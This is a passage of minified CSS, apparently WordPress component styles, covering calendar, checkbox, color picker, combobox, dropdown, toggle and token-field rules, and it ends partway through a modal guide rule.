.components-calendar__day--today:after{ border:2px solid; border-radius:50%; content:""; height:0; inset-block-start:2px; inset-inline-end:2px; position:absolute; width:0; z-index:1; } .components-calendar__day--selected:not(.components-calendar__range-middle):has(.components-calendar__day-button,.components-calendar__day-button:hover:not(:disabled)){ color:var(--wp-components-color-foreground-inverted, #fff); } .components-calendar__day--selected:not(.components-calendar__range-middle) .components-calendar__day-button:before{ background-color:var(--wp-components-color-foreground, #1e1e1e); border:1px solid #0000; } .components-calendar__day--selected:not(.components-calendar__range-middle) .components-calendar__day-button:disabled:before{ background-color:var(--wp-components-color-gray-600, #949494); } .components-calendar__day--selected:not(.components-calendar__range-middle) .components-calendar__day-button:hover:not(:disabled):before{ background-color:var(--wp-components-color-gray-800, #2f2f2f); } .components-calendar__day--hidden{ visibility:hidden; } .components-calendar__range-start:not(.components-calendar__range-end) .components-calendar__day-button,.components-calendar__range-start:not(.components-calendar__range-end) .components-calendar__day-button:before{ border-end-end-radius:0; border-start-end-radius:0; } .components-calendar__range-middle .components-calendar__day-button:before{ background-color:color-mix(in srgb, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 4%, #0000); border-color:#0000; border-radius:0; border-style:solid; border-width:1px 0; } .components-calendar__range-end:not(.components-calendar__range-start) .components-calendar__day-button,.components-calendar__range-end:not(.components-calendar__range-start) .components-calendar__day-button:before{ border-end-start-radius:0; border-start-start-radius:0; } .components-calendar__day--preview svg{ color:color-mix(in srgb, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 16%, #0000); inset:0; pointer-events:none; position:absolute; } @media (forced-colors:active){ .components-calendar__day--preview svg{ color:inherit; } } .components-calendar[dir=rtl] .components-calendar__day--preview svg{ transform:scaleX(-1); } .components-calendar__day--preview.components-calendar__range-middle .components-calendar__day-button:before{ border:none; } @keyframes slide-in-left{ 0%{ transform:translateX(-100%); } to{ transform:translateX(0); } } @keyframes slide-in-right{ 0%{ transform:translateX(100%); } to{ transform:translateX(0); } } @keyframes slide-out-left{ 0%{ transform:translateX(0); } to{ transform:translateX(-100%); } } @keyframes slide-out-right{ 0%{ transform:translateX(0); } to{ transform:translateX(100%); } } @keyframes fade-in{ 0%{ opacity:0; } to{ opacity:1; } } @keyframes fade-out{ 0%{ opacity:1; } to{ opacity:0; } } .components-calendar__caption-after-enter,.components-calendar__caption-after-exit,.components-calendar__caption-before-enter,.components-calendar__caption-before-exit,.components-calendar__weeks-after-enter,.components-calendar__weeks-after-exit,.components-calendar__weeks-before-enter,.components-calendar__weeks-before-exit{ animation-duration:0s; animation-fill-mode:forwards; animation-timing-function:cubic-bezier(.4, 0, .2, 1); } @media not (prefers-reduced-motion){ .components-calendar__caption-after-enter,.components-calendar__caption-after-exit,.components-calendar__caption-before-enter,.components-calendar__caption-before-exit,.components-calendar__weeks-after-enter,.components-calendar__weeks-after-exit,.components-calendar__weeks-before-enter,.components-calendar__weeks-before-exit{ animation-duration:.3s; } } .components-calendar[dir=rtl] .components-calendar__weeks-after-enter,.components-calendar__weeks-before-enter{ animation-name:slide-in-left; } .components-calendar[dir=rtl] .components-calendar__weeks-after-exit,.components-calendar__weeks-before-exit{ animation-name:slide-out-left; } .components-calendar[dir=rtl] .components-calendar__weeks-before-enter,.components-calendar__weeks-after-enter{ animation-name:slide-in-right; } .components-calendar[dir=rtl] .components-calendar__weeks-before-exit,.components-calendar__weeks-after-exit{ animation-name:slide-out-right; } .components-calendar__caption-after-enter{ animation-name:fade-in; } .components-calendar__caption-after-exit{ animation-name:fade-out; } .components-calendar__caption-before-enter{ animation-name:fade-in; } .components-calendar__caption-before-exit{ animation-name:fade-out; } .components-checkbox-control{ --checkbox-input-size:24px; } @media (min-width:600px){ .components-checkbox-control{ --checkbox-input-size:16px; } } .components-checkbox-control{ --checkbox-input-margin:8px; } .components-checkbox-control__label{ cursor:pointer; line-height:var(--checkbox-input-size); } .components-checkbox-control__input[type=checkbox]{ border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; line-height:normal; margin-right:12px; padding:6px 8px; transition:none; } @media not (prefers-reduced-motion){ .components-checkbox-control__input[type=checkbox]{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .components-checkbox-control__input[type=checkbox]{ font-size:13px; line-height:normal; } } .components-checkbox-control__input[type=checkbox]:focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 .5px var(--wp-admin-theme-color); } .components-checkbox-control__input[type=checkbox]::-webkit-input-placeholder{ color:#1e1e1e9e; } .components-checkbox-control__input[type=checkbox]::-moz-placeholder{ color:#1e1e1e9e; } .components-checkbox-control__input[type=checkbox]:-ms-input-placeholder{ color:#1e1e1e9e; } .components-checkbox-control__input[type=checkbox]:focus{ box-shadow:0 0 0 2px #fff, 0 0 0 4px var(--wp-admin-theme-color); } .components-checkbox-control__input[type=checkbox]:checked{ background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); } .components-checkbox-control__input[type=checkbox]:checked::-ms-check{ opacity:0; } .components-checkbox-control__input[type=checkbox]:checked:before,.components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{ color:#fff; margin:-3px -5px; } @media (min-width:782px){ .components-checkbox-control__input[type=checkbox]:checked:before,.components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{ margin:-4px 0 0 -5px; } } .components-checkbox-control__input[type=checkbox][aria-checked=mixed]{ background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); } .components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{ content:"\f460"; display:inline-block; float:left; font:normal 30px/1 dashicons; vertical-align:middle; width:16px; speak:none; -webkit-font-smoothing:antialiased; -moz-osx-font-smoothing:grayscale; } @media (min-width:782px){ .components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{ float:none; font-size:21px; } } .components-checkbox-control__input[type=checkbox]:disabled,.components-checkbox-control__input[type=checkbox][aria-disabled=true]{ background:#f0f0f0; border-color:#ddd; cursor:default; opacity:1; } .components-checkbox-control__input[type=checkbox]{ appearance:none; background:#fff; clear:none; color:#1e1e1e; cursor:pointer; display:inline-block; height:var(--checkbox-input-size); line-height:0; margin:0 4px 0 0; outline:0; padding:0 !important; text-align:center; vertical-align:top; width:var(--checkbox-input-size); } @media not (prefers-reduced-motion){ .components-checkbox-control__input[type=checkbox]{ transition:border-color .1s ease-in-out; } } .components-checkbox-control__input[type=checkbox]:focus{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff, 0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color); outline:2px solid #0000; outline-offset:2px; } .components-checkbox-control__input[type=checkbox]:checked,.components-checkbox-control__input[type=checkbox]:indeterminate{ background:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-checkbox-control__input[type=checkbox]:checked::-ms-check,.components-checkbox-control__input[type=checkbox]:indeterminate::-ms-check{ opacity:0; } .components-checkbox-control__input[type=checkbox]:checked:before{ content:none; } .components-checkbox-control__input-container{ aspect-ratio:1; display:inline-block; flex-shrink:0; line-height:1; margin-right:var(--checkbox-input-margin); position:relative; vertical-align:middle; width:var(--checkbox-input-size); } svg.components-checkbox-control__checked,svg.components-checkbox-control__indeterminate{ --checkmark-size:var(--checkbox-input-size); fill:#fff; cursor:pointer; height:var(--checkmark-size); left:50%; pointer-events:none; position:absolute; top:50%; transform:translate(-50%, -50%); -webkit-user-select:none; user-select:none; width:var(--checkmark-size); } @media (min-width:600px){ svg.components-checkbox-control__checked,svg.components-checkbox-control__indeterminate{ --checkmark-size:calc(var(--checkbox-input-size) + 4px); } } .components-checkbox-control__help{ display:inline-block; margin-inline-start:calc(var(--checkbox-input-size) + var(--checkbox-input-margin)); } .components-circular-option-picker{ display:inline-block; min-width:188px; width:100%; } .components-circular-option-picker .components-circular-option-picker__custom-clear-wrapper{ display:flex; justify-content:flex-end; margin-top:12px; } .components-circular-option-picker .components-circular-option-picker__swatches{ display:flex; flex-wrap:wrap; gap:12px; position:relative; z-index:1; } .components-circular-option-picker>:not(.components-circular-option-picker__swatches){ position:relative; z-index:0; } .components-circular-option-picker__option-wrapper{ display:inline-block; height:28px; transform:scale(1); vertical-align:top; width:28px; } @media not (prefers-reduced-motion){ .components-circular-option-picker__option-wrapper{ transition:transform .1s ease; will-change:transform; } } .components-circular-option-picker__option-wrapper:hover{ transform:scale(1.2); } .components-circular-option-picker__option-wrapper>div{ height:100%; width:100%; } .components-circular-option-picker__option-wrapper:before{ background:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='28' height='28' fill='none'%3E%3Cpath fill='%23555d65' d='M6 8V6H4v2zm2 0V6h2v2zm2 8H8v-2h2zm2 0v-2h2v2zm0 2v-2h-2v2H8v2h2v-2zm2 0v2h-2v-2zm2 0h-2v-2h2z'/%3E%3Cpath fill='%23555d65' fill-rule='evenodd' d='M18 18h2v-2h-2v-2h2v-2h-2v-2h2V8h-2v2h-2V8h-2v2h2v2h-2v2h2v2h2zm-2-4v-2h2v2z' clip-rule='evenodd'/%3E%3Cpath fill='%23555d65' d='M18 18v2h-2v-2z'/%3E%3Cpath fill='%23555d65' fill-rule='evenodd' d='M8 10V8H6v2H4v2h2v2H4v2h2v2H4v2h2v2H4v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h2V4h-2v2h-2V4h-2v2h-2V4h-2v2h-2V4h-2v2h2v2h-2v2zm0 2v-2H6v2zm2 0v-2h2v2zm0 2v-2H8v2H6v2h2v2H6v2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h-2v2h-2V6h-2v2h-2v2h2v2h-2v2z' clip-rule='evenodd'/%3E%3Cpath fill='%23555d65' fill-rule='evenodd' d='M4 0H2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h2V4h-2V2h2V0h-2v2h-2V0h-2v2h-2V0h-2v2h-2V0h-2v2h-2V0h-2v2H8V0H6v2H4zm0 4V2H2v2zm2 0V2h2v2zm0 2V4H4v2H2v2h2v2H2v2h2v2H2v2h2v2H2v2h2v2H2v2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h2V4h-2V2h-2v2h-2V2h-2v2h-2V2h-2v2h-2V2h-2v2H8v2z' clip-rule='evenodd'/%3E%3C/svg%3E"); border-radius:50%; bottom:1px; content:""; left:1px; position:absolute; right:1px; top:1px; z-index:-1; } .components-circular-option-picker__option{ aspect-ratio:1; background:#0000; border:none; border-radius:50%; box-shadow:inset 0 0 0 14px; display:inline-block; height:100% !important; vertical-align:top; } @media not (prefers-reduced-motion){ .components-circular-option-picker__option{ transition:box-shadow .1s ease; } } .components-circular-option-picker__option{ cursor:pointer; } .components-circular-option-picker__option:hover{ box-shadow:inset 0 0 0 14px !important; } .components-circular-option-picker__option[aria-pressed=true],.components-circular-option-picker__option[aria-selected=true]{ box-shadow:inset 0 0 0 4px; overflow:visible; position:relative; z-index:1; } .components-circular-option-picker__option[aria-pressed=true]+svg,.components-circular-option-picker__option[aria-selected=true]+svg{ border-radius:50%; left:2px; pointer-events:none; position:absolute; top:2px; z-index:2; } .components-circular-option-picker__option:after{ border:1px solid #0000; border-radius:50%; bottom:-1px; box-shadow:inset 0 0 0 1px #0003; box-sizing:inherit; content:""; left:-1px; position:absolute; right:-1px; top:-1px; } .components-circular-option-picker__option:focus:after{ border:2px solid #757575; border-radius:50%; box-shadow:inset 0 0 0 2px #fff; content:""; height:calc(100% + 4px); left:50%; position:absolute; top:50%; transform:translate(-50%, -50%); width:calc(100% + 4px); } .components-circular-option-picker__option.components-button:focus{ background-color:initial; box-shadow:inset 0 0 0 14px; outline:none; } .components-circular-option-picker__button-action .components-circular-option-picker__option{ background:#fff; color:#fff; } .components-circular-option-picker__dropdown-link-action{ margin-right:16px; } .components-circular-option-picker__dropdown-link-action .components-button{ line-height:22px; } .components-palette-edit__popover-gradient-picker{ padding:8px; width:260px; } .components-dropdown-menu__menu .components-palette-edit__menu-button{ width:100%; } .component-color-indicator{ background:#fff linear-gradient(-45deg, #0000 48%, #ddd 0, #ddd 52%, #0000 0); border-radius:50%; box-shadow:inset 0 0 0 1px #0003; display:inline-block; height:20px; padding:0; width:20px; } .components-combobox-control{ width:100%; } input.components-combobox-control__input[type=text]{ background:var(--wp-components-color-background, #fff); border:none; box-shadow:none; color:var(--wp-components-color-foreground, #1e1e1e); font-family:inherit; font-size:16px; line-height:inherit; margin:0; min-height:auto; padding:2px; width:100%; } @media (min-width:600px){ input.components-combobox-control__input[type=text]{ font-size:13px; } } input.components-combobox-control__input[type=text]:focus{ box-shadow:none; outline:none; } .components-combobox-control__suggestions-container{ border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; line-height:normal; padding:6px 8px; } @media not (prefers-reduced-motion){ .components-combobox-control__suggestions-container{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .components-combobox-control__suggestions-container{ font-size:13px; line-height:normal; } } .components-combobox-control__suggestions-container:focus{ border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); box-shadow:0 0 0 .5px var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; } .components-combobox-control__suggestions-container::-webkit-input-placeholder{ color:#1e1e1e9e; } .components-combobox-control__suggestions-container::-moz-placeholder{ color:#1e1e1e9e; } .components-combobox-control__suggestions-container:-ms-input-placeholder{ color:#1e1e1e9e; } .components-combobox-control__suggestions-container{ align-items:flex-start; display:flex; flex-wrap:wrap; padding:0; width:100%; } .components-combobox-control__suggestions-container:focus-within{ border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); box-shadow:0 0 0 .5px var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; } .components-combobox-control__suggestions-container .components-spinner{ margin:0; } .components-color-palette__custom-color-wrapper{ position:relative; z-index:0; } .components-color-palette__custom-color-button{ background:none; border:none; border-radius:4px 4px 0 0; box-shadow:inset 0 0 0 1px #0003; box-sizing:border-box; cursor:pointer; height:64px; outline:1px solid #0000; position:relative; width:100%; } .components-color-palette__custom-color-button:focus{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline-width:2px; } .components-color-palette__custom-color-button:after{ background-image:repeating-linear-gradient(45deg, #e0e0e0 25%, #0000 0, #0000 75%, #e0e0e0 0, #e0e0e0), repeating-linear-gradient(45deg, #e0e0e0 25%, #0000 0, #0000 75%, #e0e0e0 0, #e0e0e0); background-position:0 0, 24px 24px; background-size:48px 48px; border-radius:3px 3px 0 0; content:""; inset:1px; position:absolute; z-index:-1; } .components-color-palette__custom-color-text-wrapper{ border-radius:0 0 4px 4px; box-shadow:inset 0 -1px 0 0 #0003,inset 1px 0 0 0 #0003,inset -1px 0 0 0 #0003; font-size:13px; padding:12px 16px; position:relative; } .components-color-palette__custom-color-name{ color:var(--wp-components-color-foreground, #1e1e1e); margin:0 1px; } .components-color-palette__custom-color-value{ color:#757575; } .components-color-palette__custom-color-value--is-hex{ text-transform:uppercase; } .components-color-palette__custom-color-value:empty:after{ content:"​"; visibility:hidden; } .components-custom-gradient-picker__gradient-bar{ border-radius:2px; height:48px; position:relative; width:100%; z-index:1; } .components-custom-gradient-picker__gradient-bar.has-gradient{ background-image:repeating-linear-gradient(45deg, #e0e0e0 25%, #0000 0, #0000 75%, #e0e0e0 0, #e0e0e0), repeating-linear-gradient(45deg, #e0e0e0 25%, #0000 0, #0000 75%, #e0e0e0 0, #e0e0e0); background-position:0 0, 12px 12px; background-size:24px 24px; } .components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__gradient-bar-background{ inset:0; position:absolute; } .components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__markers-container{ margin-left:auto; margin-right:auto; position:relative; width:calc(100% - 48px); } .components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-dropdown{ display:flex; height:16px; position:absolute; top:16px; width:16px; } .components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__insert-point-dropdown{ background:#fff; border-radius:50%; color:#1e1e1e; height:inherit; min-width:16px !important; padding:2px; position:relative; width:inherit; } .components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__insert-point-dropdown svg{ height:100%; width:100%; } .components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-button{ border-radius:50%; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) #fff, 0 0 2px 0 #00000040; height:inherit; outline:2px solid #0000; padding:0; width:inherit; } .components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-button.is-active,.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-button:focus{ box-shadow:inset 0 0 0 calc(var(--wp-admin-border-width-focus)*2) #fff, 0 0 2px 0 #00000040; outline:1.5px solid #0000; } .components-custom-gradient-picker__remove-control-point-wrapper{ padding-bottom:8px; } .components-custom-gradient-picker__inserter{ direction:ltr; } .components-custom-gradient-picker__liner-gradient-indicator{ display:inline-block; flex:0 auto; height:20px; width:20px; } .components-custom-gradient-picker__ui-line{ position:relative; z-index:0; } body.is-dragging-components-draggable{ cursor:move; cursor:grabbing !important; } .components-draggable__invisible-drag-image{ height:50px; left:-1000px; position:fixed; width:50px; } .components-draggable__clone{ background:#0000; padding:0; pointer-events:none; position:fixed; z-index:1000000000; } .components-drop-zone{ border-radius:2px; bottom:0; left:0; opacity:0; position:absolute; right:0; top:0; visibility:hidden; z-index:40; } .components-drop-zone.is-active{ opacity:1; visibility:visible; } .components-drop-zone .components-drop-zone__content{ align-items:center; background-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); bottom:0; color:#fff; display:flex; height:100%; justify-content:center; left:0; opacity:0; pointer-events:none; position:absolute; right:0; text-align:center; top:0; width:100%; z-index:50; } .components-drop-zone .components-drop-zone__content-inner{ opacity:0; transform:scale(.9); } .components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content{ opacity:1; } @media not (prefers-reduced-motion){ .components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content{ transition:opacity .2s ease-in-out; } } .components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content-inner{ opacity:1; transform:scale(1); } @media not (prefers-reduced-motion){ .components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content-inner{ transition:opacity .1s ease-in-out .1s,transform .1s ease-in-out .1s; } } .components-drop-zone__content-icon,.components-drop-zone__content-text{ display:block; } .components-drop-zone__content-icon{ line-height:0; margin:0 auto 8px; fill:currentColor; pointer-events:none; } .components-drop-zone__content-text{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; } .components-dropdown{ display:inline-block; } .components-dropdown__content .components-popover__content{ padding:8px; } .components-dropdown__content .components-popover__content:has(.components-menu-group){ padding:0; } .components-dropdown__content .components-popover__content:has(.components-menu-group) .components-dropdown-menu__menu>.components-menu-item__button,.components-dropdown__content .components-popover__content:has(.components-menu-group)>.components-menu-item__button{ margin:8px; width:auto; } .components-dropdown__content [role=menuitem]{ white-space:nowrap; } .components-dropdown__content .components-menu-group{ padding:8px; } .components-dropdown__content .components-menu-group+.components-menu-group{ border-top:1px solid #ccc; padding:8px; } .components-dropdown__content.is-alternate .components-menu-group+.components-menu-group{ border-color:#1e1e1e; } .components-dropdown-menu__toggle{ vertical-align:top; } .components-dropdown-menu__menu{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; line-height:1.4; width:100%; } .components-dropdown-menu__menu .components-dropdown-menu__menu-item,.components-dropdown-menu__menu .components-menu-item{ cursor:pointer; outline:none; padding:6px; white-space:nowrap; width:100%; } .components-dropdown-menu__menu .components-dropdown-menu__menu-item.has-separator,.components-dropdown-menu__menu .components-menu-item.has-separator{ margin-top:6px; overflow:visible; position:relative; } .components-dropdown-menu__menu .components-dropdown-menu__menu-item.has-separator:before,.components-dropdown-menu__menu .components-menu-item.has-separator:before{ background-color:#ddd; box-sizing:initial; content:""; display:block; height:1px; left:0; position:absolute; right:0; top:-3px; } .components-dropdown-menu__menu .components-dropdown-menu__menu-item.is-active .dashicon,.components-dropdown-menu__menu .components-dropdown-menu__menu-item.is-active svg,.components-dropdown-menu__menu .components-menu-item.is-active .dashicon,.components-dropdown-menu__menu .components-menu-item.is-active svg{ background:#1e1e1e; border-radius:1px; box-shadow:0 0 0 1px #1e1e1e; color:#fff; } .components-dropdown-menu__menu .components-dropdown-menu__menu-item.is-icon-only,.components-dropdown-menu__menu .components-menu-item.is-icon-only{ width:auto; } .components-dropdown-menu__menu .components-menu-item__button,.components-dropdown-menu__menu .components-menu-item__button.components-button{ height:auto; min-height:40px; padding-left:8px; padding-right:8px; text-align:left; } .components-duotone-picker__color-indicator:before{ background:#0000; } .components-duotone-picker__color-indicator>.components-button,.components-duotone-picker__color-indicator>.components-button.is-pressed:hover:not(:disabled){ background:linear-gradient(-45deg, #0000 48%, #ddd 0, #ddd 52%, #0000 0); color:#0000; } .components-duotone-picker__color-indicator>.components-button:hover:not(:disabled):not([aria-disabled=true]),.components-duotone-picker__color-indicator>.components-button:not([aria-disabled=true]):active{ color:#0000; } .components-color-list-picker,.components-color-list-picker__swatch-button{ width:100%; } .components-color-list-picker__color-picker{ margin:8px 0; } .components-color-list-picker__swatch-color{ margin:2px; } .components-external-link{ text-decoration:none; } .components-external-link__contents{ text-decoration:underline; } .components-external-link__icon{ font-weight:400; margin-left:.5ch; } .components-form-toggle,.components-form-toggle .components-form-toggle__track{ display:inline-block; height:16px; position:relative; } .components-form-toggle .components-form-toggle__track{ background-color:#fff; border:1px solid #949494; border-radius:8px; box-sizing:border-box; content:""; vertical-align:top; width:32px; } @media not (prefers-reduced-motion){ .components-form-toggle .components-form-toggle__track{ transition:background-color .2s ease,border-color .2s ease; } } .components-form-toggle .components-form-toggle__track{ overflow:hidden; } .components-form-toggle .components-form-toggle__track:after{ border-top:16px solid #0000; box-sizing:border-box; content:""; inset:0; position:absolute; } @media not (prefers-reduced-motion){ .components-form-toggle .components-form-toggle__track:after{ transition:opacity .2s ease; } } .components-form-toggle .components-form-toggle__track:after{ opacity:0; } .components-form-toggle .components-form-toggle__thumb{ border-radius:50%; box-sizing:border-box; display:block; height:12px; left:2px; position:absolute; top:2px; width:12px; } @media not (prefers-reduced-motion){ .components-form-toggle .components-form-toggle__thumb{ transition:transform .2s ease,background-color .2s ease-out; } } .components-form-toggle .components-form-toggle__thumb{ background-color:#1e1e1e; border:6px solid #0000; box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003; } .components-form-toggle.is-checked .components-form-toggle__track{ background-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-form-toggle.is-checked .components-form-toggle__track:after{ opacity:1; } .components-form-toggle .components-form-toggle__input:focus+.components-form-toggle__track{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff, 0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; outline-offset:2px; } .components-form-toggle.is-checked .components-form-toggle__thumb{ background-color:#fff; border-width:0; transform:translateX(16px); } .components-disabled .components-form-toggle,.components-form-toggle.is-disabled{ opacity:.3; } .components-form-toggle input.components-form-toggle__input[type=checkbox]{ border:none; height:100%; left:0; margin:0; opacity:0; padding:0; position:absolute; top:0; width:100%; z-index:1; } .components-form-toggle input.components-form-toggle__input[type=checkbox]:checked{ background:none; } .components-form-toggle input.components-form-toggle__input[type=checkbox]:before{ content:""; } .components-form-toggle input.components-form-toggle__input[type=checkbox]:not(:disabled,[aria-disabled=true]){ cursor:pointer; } .components-form-token-field__input-container{ border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; line-height:normal; padding:6px 8px; } @media not (prefers-reduced-motion){ .components-form-token-field__input-container{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .components-form-token-field__input-container{ font-size:13px; line-height:normal; } } .components-form-token-field__input-container:focus{ border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); box-shadow:0 0 0 .5px var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; } .components-form-token-field__input-container::-webkit-input-placeholder{ color:#1e1e1e9e; } .components-form-token-field__input-container::-moz-placeholder{ color:#1e1e1e9e; } .components-form-token-field__input-container:-ms-input-placeholder{ color:#1e1e1e9e; } .components-form-token-field__input-container{ cursor:text; padding:0; width:100%; } .components-form-token-field__input-container.is-disabled{ background:#ddd; border-color:#ddd; } .components-form-token-field__input-container.is-active{ border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); box-shadow:0 0 0 .5px var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; } .components-form-token-field__input-container input[type=text].components-form-token-field__input{ background:inherit; border:0; box-shadow:none; color:var(--wp-components-color-foreground, #1e1e1e); display:inline-block; flex:1; font-family:inherit; font-size:16px; margin-left:4px; max-width:100%; min-height:24px; min-width:50px; padding:0; width:100%; } @media (min-width:600px){ .components-form-token-field__input-container input[type=text].components-form-token-field__input{ font-size:13px; } } .components-form-token-field.is-active .components-form-token-field__input-container input[type=text].components-form-token-field__input,.components-form-token-field__input-container input[type=text].components-form-token-field__input:focus{ box-shadow:none; outline:none; } .components-form-token-field__input-container .components-form-token-field__token+input[type=text].components-form-token-field__input{ width:auto; } .components-form-token-field__token{ color:#1e1e1e; display:flex; font-size:13px; max-width:100%; } .components-form-token-field__token.is-success .components-form-token-field__remove-token,.components-form-token-field__token.is-success .components-form-token-field__token-text{ background:#4ab866; } .components-form-token-field__token.is-error .components-form-token-field__remove-token,.components-form-token-field__token.is-error .components-form-token-field__token-text{ background:#cc1818; } .components-form-token-field__token.is-validating .components-form-token-field__remove-token,.components-form-token-field__token.is-validating .components-form-token-field__token-text{ color:#757575; } .components-form-token-field__token.is-borderless{ padding:0 24px 0 0; position:relative; } .components-form-token-field__token.is-borderless .components-form-token-field__token-text{ background:#0000; } .components-form-token-field__token.is-borderless:not(.is-disabled) .components-form-token-field__token-text{ color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-form-token-field__token.is-borderless .components-form-token-field__remove-token{ background:#0000; color:#757575; position:absolute; right:0; top:1px; } .components-form-token-field__token.is-borderless.is-success .components-form-token-field__token-text{ color:#4ab866; } .components-form-token-field__token.is-borderless.is-error .components-form-token-field__token-text{ color:#cc1818; padding:0 4px 0 6px; } .components-form-token-field__token.is-borderless.is-validating .components-form-token-field__token-text{ color:#1e1e1e; } .components-form-token-field__remove-token.components-button,.components-form-token-field__token-text{ background:#ddd; display:inline-block; height:auto; min-width:unset; } @media not (prefers-reduced-motion){ .components-form-token-field__remove-token.components-button,.components-form-token-field__token-text{ transition:all .2s cubic-bezier(.4, 1, .4, 1); } } .components-form-token-field__token-text{ border-radius:1px 0 0 1px; line-height:24px; overflow:hidden; padding:0 0 0 8px; text-overflow:ellipsis; white-space:nowrap; } .components-form-token-field__remove-token.components-button{ border-radius:0 1px 1px 0; color:#1e1e1e; line-height:10px; overflow:initial; } .components-form-token-field__remove-token.components-button:hover:not(:disabled){ color:#1e1e1e; } .components-form-token-field__suggestions-list{ flex:1 0 100%; max-height:128px; min-width:100%; overflow-y:auto; } @media not (prefers-reduced-motion){ .components-form-token-field__suggestions-list{ transition:all .15s ease-in-out; } } .components-form-token-field__suggestions-list{ box-shadow:inset 0 1px 0 0 #949494; list-style:none; margin:0; padding:0; } .components-form-token-field__suggestion{ box-sizing:border-box; color:var(--wp-components-color-foreground, #1e1e1e); display:block; font-size:13px; margin:0; min-height:32px; padding:8px 12px; } .components-form-token-field__suggestion.is-selected{ background:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); color:var(--wp-components-color-foreground-inverted, #fff); } .components-form-token-field__suggestion[aria-disabled=true]{ color:#949494; pointer-events:none; } .components-form-token-field__suggestion[aria-disabled=true].is-selected{ background:color-mix(in srgb, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 4%, #0000); } .components-form-token-field__suggestion:not(.is-empty){ cursor:pointer; } @media (min-width:600px){ .components-guide{ width:600px; } } .components-guide .components-modal__content{ margin-top:0; padding:0; } .components-guide .components-modal__content:before{ content:none; } .components-guide .components-modal__header{ 